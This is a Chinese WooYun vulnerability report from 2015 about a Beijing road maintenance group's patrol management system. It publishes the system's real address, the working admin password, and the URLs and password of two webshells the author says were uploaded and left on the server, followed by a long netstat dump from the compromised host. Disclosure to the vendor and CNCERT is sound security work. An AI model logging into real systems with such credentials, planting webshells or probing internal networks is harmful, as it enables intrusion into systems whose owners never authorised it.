北京市政路桥管理养护集团巡查管理系统沦陷/内网漫游等安全影响

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0116220

漏洞标题：北京市政路桥管理养护集团巡查管理系统沦陷/内网漫游等安全影响

漏洞作者：朱元璋

提交时间：2015-05-26 10:16

修复时间：2015-07-14 21:58

公开时间：2015-07-14 21:58

漏洞类型：后台弱口令

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-05-26：细节已通知厂商并且等待厂商处理中
2015-05-30：厂商已经确认，细节仅向厂商公开
2015-06-09：细节向核心白帽子及相关领域专家公开
2015-06-19：细节向普通白帽子公开
2015-06-29：细节向实习白帽子公开
2015-07-14：细节向公众公开

简要描述：

传有马，自己杀

详细说明：

地址http://114.251.7.140:85/rtyhmap/login.jsp
输入admin//admin123直接进入系统

传马看内网情况
地址http://114.251.7.140:85/rtyhmap/pda/pic/%7B20150526-0804-0832-0000-7641C1A66CB8%7D.jsp 连接密码tom

地址http://114.251.7.140:85/rtyhmap/pda/pic/%7B20150526-0826-5867-0001-ACB33EC72DD5%7D.jsp 无密码

netstat -an

Active Connections
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:81             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:85             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:97             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1025           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1434           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2198           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:4891           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5001           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5002           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5003           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5050           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5060           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5300           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5353           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8121           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:8123           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9900           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:26292          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:29900          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:60944          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1040         127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:1042         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:1043         127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:1051         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:1063         127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:1073         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1095         127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:1097         127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:1100         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:1101         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:1110         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:1520         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:4458         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:4765         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5805         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5821         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5836         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5851         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5864         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5879         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5892         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5906         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5919         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5934         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5954         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5968         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5981         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:5996         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:6011         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:6026         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:6039         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:6053         ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:17634        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:20039        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:21205        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:26293        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:27826        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:32458        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:33223        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:34675        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:37530        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:40356        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:41054        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:41753        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:43905        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:44630        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:45355        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:46079        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:46823        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:49010        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:52745        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:55784        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:56166        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:59864        ESTABLISHED
  TCP    127.0.0.1:1433         127.0.0.1:65192        ESTABLISHED
  TCP    127.0.0.1:1520         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:4458         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:4765         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5805         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5821         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5836         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5851         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5864         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5879         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5892         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5906         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5919         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5934         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5954         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5968         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5981         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:5996         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:6011         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:6026         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:6038         127.0.0.1:1433         TIME_WAIT
  TCP    127.0.0.1:6039         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:6042         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6043         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6044         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6045         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6052         127.0.0.1:1433         TIME_WAIT
  TCP    127.0.0.1:6053         127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:6054         127.0.0.1:1433         TIME_WAIT
  TCP    127.0.0.1:6056         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6057         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6058         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6059         127.0.0.1:8123         TIME_WAIT
  TCP    127.0.0.1:6060         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:6061         127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:6802         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:6803         0.0.0.0:0              LISTENING
  TCP    127.0.0.1:8123         127.0.0.1:1042         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:1051         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:1100         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:1101         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:1110         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:6060         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:6061         ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:60257        ESTABLISHED
  TCP    127.0.0.1:8123         127.0.0.1:60260        ESTABLISHED
  TCP    127.0.0.1:17634        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:20039        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:21205        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:26293        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:27826        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:29899        127.0.0.1:29901        ESTABLISHED
  TCP    127.0.0.1:29901        127.0.0.1:29899        ESTABLISHED
  TCP    127.0.0.1:32458        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:33223        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:34675        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:37530        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:40356        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:41054        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:41753        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:43905        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:44630        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:45355        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:46079        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:46823        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:49010        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:52745        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:55784        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:55975        127.0.0.1:55976        ESTABLISHED
  TCP    127.0.0.1:55976        127.0.0.1:55975        ESTABLISHED
  TCP    127.0.0.1:56166        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:59864        127.0.0.1:1433         ESTABLISHED
  TCP    127.0.0.1:60254        127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:60257        127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:60259        127.0.0.1:8123         CLOSE_WAIT
  TCP    127.0.0.1:60260        127.0.0.1:8123         ESTABLISHED
  TCP    127.0.0.1:60942        127.0.0.1:60945        ESTABLISHED
  TCP    127.0.0.1:60945        127.0.0.1:60942        ESTABLISHED
  TCP    127.0.0.1:65192        127.0.0.1:1433         ESTABLISHED
  TCP    172.18.28.10:81        123.127.94.135:51436   ESTABLISHED
  TCP    172.18.28.10:85        101.226.33.226:43558   CLOSE_WAIT
  TCP    172.18.28.10:85        171.36.156.233:54041   ESTABLISHED
  TCP    172.18.28.10:85        171.36.156.233:54047   ESTABLISHED
  TCP    172.18.28.10:85        171.36.156.233:54324   ESTABLISHED
  TCP    172.18.28.10:85        180.153.206.17:51866   TIME_WAIT
  TCP    172.18.28.10:85        180.153.206.17:51867   TIME_WAIT
  TCP    172.18.28.10:85        180.153.206.17:51868   TIME_WAIT
  TCP    172.18.28.10:85        180.153.206.17:51869   TIME_WAIT
  TCP    172.18.28.10:97        1.24.34.233:37792      LAST_ACK
  TCP    172.18.28.10:97        1.197.5.239:50434      LAST_ACK
  TCP    172.18.28.10:97        27.185.67.78:2431      LAST_ACK
  TCP    172.18.28.10:97        61.143.59.171:32964    LAST_ACK
  TCP    172.18.28.10:97        112.97.30.2:59050      LAST_ACK
  TCP    172.18.28.10:97        112.97.39.71:63084     FIN_WAIT_1
  TCP    172.18.28.10:97        117.136.20.153:27702   FIN_WAIT_2
  TCP    172.18.28.10:97        117.136.20.153:27705   FIN_WAIT_2
  TCP    172.18.28.10:97        117.136.20.153:27706   FIN_WAIT_2
  TCP    172.18.28.10:97        117.136.20.153:27707   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27709   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27710   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27712   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27713   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27714   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27715   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27716   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27717   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27718   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27719   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27720   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27721   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27722   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27723   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27724   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27725   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27726   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27727   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27728   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27729   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27730   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27731   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27733   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27734   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27735   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27736   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27737   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27738   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27739   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27740   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27741   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27742   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27743   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27744   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27745   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27746   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27747   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27748   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27750   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27751   ESTABLISHED
  TCP    172.18.28.10:97        117.136.20.153:27753   ESTABLISHED
  TCP    172.18.28.10:97        117.136.80.231:4394    ESTABLISHED
  TCP    172.18.28.10:97        122.13.140.194:8079    ESTABLISHED
  TCP    172.18.28.10:97        123.161.234.83:24660   LAST_ACK
  TCP    172.18.28.10:97        123.161.234.83:24663   LAST_ACK
  TCP    172.18.28.10:97        123.161.234.83:24670   LAST_ACK
  TCP    172.18.28.10:97        123.161.234.83:24672   LAST_ACK
  TCP    172.18.28.10:97        153.119.203.12:11599   ESTABLISHED
  TCP    172.18.28.10:139       0.0.0.0:0              LISTENING
  TCP    172.18.28.10:3389      1.93.16.193:2032       ESTABLISHED
  TCP    172.18.28.10:3389      1.93.16.193:4834       ESTABLISHED
  TCP    172.18.28.10:3389      61.178.107.16:63950    ESTABLISHED
  TCP    172.18.28.10:4118      172.18.28.10:5050      ESTABLISHED
  TCP    172.18.28.10:4129      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:4602      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:4635      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:4758      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:4891      61.164.211.41:28631    ESTABLISHED
  TCP    172.18.28.10:4891      115.231.71.6:28617     ESTABLISHED
  TCP    172.18.28.10:4891      123.114.112.234:17453  ESTABLISHED
  TCP    172.18.28.10:4891      180.152.116.235:6074   ESTABLISHED
  TCP    172.18.28.10:4891      180.152.116.235:24927  ESTABLISHED
  TCP    172.18.28.10:5001      117.136.0.99:30897     ESTABLISHED
  TCP    172.18.28.10:5001      117.136.0.118:31523    ESTABLISHED
  TCP    172.18.28.10:5001      117.136.0.123:33949    ESTABLISHED
  TCP    172.18.28.10:5001      117.136.0.146:64833    ESTABLISHED
  TCP    172.18.28.10:5001      117.136.0.165:11111    FIN_WAIT_1
  TCP    172.18.28.10:5001      117.136.0.229:22870    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.152:54575    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.157:13455    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.165:33959    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.182:61610    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.201:48279    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.230:38110    ESTABLISHED
  TCP    172.18.28.10:5001      223.104.3.252:35699    ESTABLISHED
  TCP    172.18.28.10:5050      171.36.156.233:51946   CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:1294      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:1385      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:3212      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:3572      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:4118      ESTABLISHED
  TCP    172.18.28.10:5050      172.18.28.10:6040      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:6359      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:9441      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:9448      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:9595      CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:10327     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:13122     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:17334     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:18040     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:18581     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:19262     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:19991     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:21908     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:22093     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:25182     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:26626     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:27481     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:27598     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:27731     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:28107     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:28197     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:30055     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:32459     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:32841     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:35191     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:35869     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:36065     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:36413     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:37071     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:37080     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:38898     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:39129     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:39137     ESTABLISHED
  TCP    172.18.28.10:5050      172.18.28.10:39147     ESTABLISHED
  TCP    172.18.28.10:5050      172.18.28.10:42452     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:44967     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:45339     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:46070     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:46352     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:49951     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:51841     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:53558     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:54229     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:54577     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:55027     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:55147     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:56152     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:57601     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:60061     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:62139     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:62306     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:64658     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:65171     CLOSE_WAIT
  TCP    172.18.28.10:5050      172.18.28.10:65371     CLOSE_WAIT
  TCP    172.18.28.10:5050      222.186.21.112:3268    CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.154.214:47168   CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.154.214:56559   CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.154.221:38446   CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.154.221:38590   CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.154.221:53729   CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:40066     CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:40355     CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:49854     CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:50335     CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:53687     CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:58550     CLOSE_WAIT
  TCP    172.18.28.10:5060      204.93.180.4:59686     CLOSE_WAIT
  TCP    172.18.28.10:5082      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5243      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:4129      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:4602      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:4635      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:4758      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5082      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5243      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5383      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5536      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5640      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5683      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5687      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:5840      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:6015      ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:6040      TIME_WAIT
  TCP    172.18.28.10:5353      172.18.28.10:6050      TIME_WAIT
  TCP    172.18.28.10:5353      172.18.28.10:39138     ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:39144     ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:39148     ESTABLISHED
  TCP    172.18.28.10:5353      172.18.28.10:39160     ESTABLISHED
  TCP    172.18.28.10:5383      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5536      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5640      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5683      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5687      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:5840      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:6015      172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:6063      172.18.28.10:5353      TIME_WAIT
  TCP    172.18.28.10:6064      202.108.23.29:80       CLOSE_WAIT
  TCP    172.18.28.10:22702     61.135.185.18:5287     ESTABLISHED
  TCP    172.18.28.10:39137     172.18.28.10:5050      ESTABLISHED
  TCP    172.18.28.10:39138     172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:39144     172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:39147     172.18.28.10:5050      ESTABLISHED
  TCP    172.18.28.10:39148     172.18.28.10:5353      ESTABLISHED
  TCP    172.18.28.10:39160     172.18.28.10:5353      ESTABLISHED
  UDP    0.0.0.0:96             *:*                    
  UDP    0.0.0.0:445            *:*                    
  UDP    0.0.0.0:500            *:*                    
  UDP    0.0.0.0:1516           *:*                    
  UDP    0.0.0.0:1517           *:*                    
  UDP    0.0.0.0:1522           *:*                    
  UDP    0.0.0.0:1544           *:*                    
  UDP    0.0.0.0:1546           *:*                    
  UDP    0.0.0.0:1736           *:*                    
  UDP    0.0.0.0:2654           *:*                    
  UDP    0.0.0.0:2795           *:*                    
  UDP    0.0.0.0:2833           *:*                    
  UDP    0.0.0.0:3178           *:*                    
  UDP    0.0.0.0:4500           *:*                    
  UDP    0.0.0.0:4650           *:*                    
  UDP    0.0.0.0:5089           *:*                    
  UDP    0.0.0.0:5490           *:*                    
  UDP    0.0.0.0:5491           *:*                    
  UDP    0.0.0.0:5495           *:*                    
  UDP    0.0.0.0:6162           *:*                    
  UDP    0.0.0.0:7444           *:*                    
  UDP    0.0.0.0:7676           *:*                    
  UDP    0.0.0.0:9218           *:*                    
  UDP    0.0.0.0:9835           *:*                    
  UDP    0.0.0.0:10796          *:*                    
  UDP    0.0.0.0:12248          *:*                    
  UDP    0.0.0.0:12388          *:*                    
  UDP    0.0.0.0:14002          *:*                    
  UDP    0.0.0.0:14779          *:*                    
  UDP    0.0.0.0:15291          *:*                    
  UDP    0.0.0.0:15293          *:*                    
  UDP    0.0.0.0:15648          *:*                    
  UDP    0.0.0.0:17110          *:*                    
  UDP    0.0.0.0:17111          *:*                    
  UDP    0.0.0.0:17284          *:*                    
  UDP    0.0.0.0:17325          *:*                    
  UDP    0.0.0.0:19049          *:*                    
  UDP    0.0.0.0:19803          *:*                    
  UDP    0.0.0.0:20813          *:*                    
  UDP    0.0.0.0:22444          *:*                    
  UDP    0.0.0.0:22597          *:*                    
  UDP    0.0.0.0:22695          *:*                    
  UDP    0.0.0.0:22716          *:*                    
  UDP    0.0.0.0:22742          *:*                    
  UDP    0.0.0.0:22778          *:*                    
  UDP    0.0.0.0:22865          *:*                    
  UDP    0.0.0.0:22969          *:*                    
  UDP    0.0.0.0:23083          *:*                    
  UDP    0.0.0.0:23186          *:*                    
  UDP    0.0.0.0:23303          *:*                    
  UDP    0.0.0.0:23402          *:*                    
  UDP    0.0.0.0:23533          *:*                    
  UDP    0.0.0.0:23710          *:*                    
  UDP    0.0.0.0:24002          *:*                    
  UDP    0.0.0.0:24325          *:*                    
  UDP    0.0.0.0:24409          *:*                    
  UDP    0.0.0.0:24662          *:*                    
  UDP    0.0.0.0:25031          *:*                    
  UDP    0.0.0.0:25192          *:*                    
  UDP    0.0.0.0:25431          *:*                    
  UDP    0.0.0.0:25851          *:*                    
